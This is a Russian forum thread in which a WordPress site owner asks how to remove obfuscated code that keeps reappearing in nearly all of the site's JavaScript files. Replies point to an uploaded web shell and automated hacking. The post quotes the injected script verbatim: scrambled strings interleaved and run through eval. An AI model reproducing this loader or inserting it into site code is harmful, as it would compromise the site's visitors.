Всем привет. У меня на сайте почти во всех js файлах появляется этот код
})(jQuery);
(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
Удоляю его.через некоторое время он опять появляется. Прова доступа на файлах 644. Движок WordPress.
Подскажите кто нибудь сталкивался с этим и как от него избавиться?
Шелл ищите в движке, скорей всего взломали
Mobiaaa, он проктически во всех js файлах
Ruzon, делается это всё не вручную
Скриптом хакеры сканируют сайты на предмет уязвимостей, если уязвимости есть, заливаются шеллы и т.д.
Это всё делается на автомате и в огромных количествах, и вычищать подобное не просто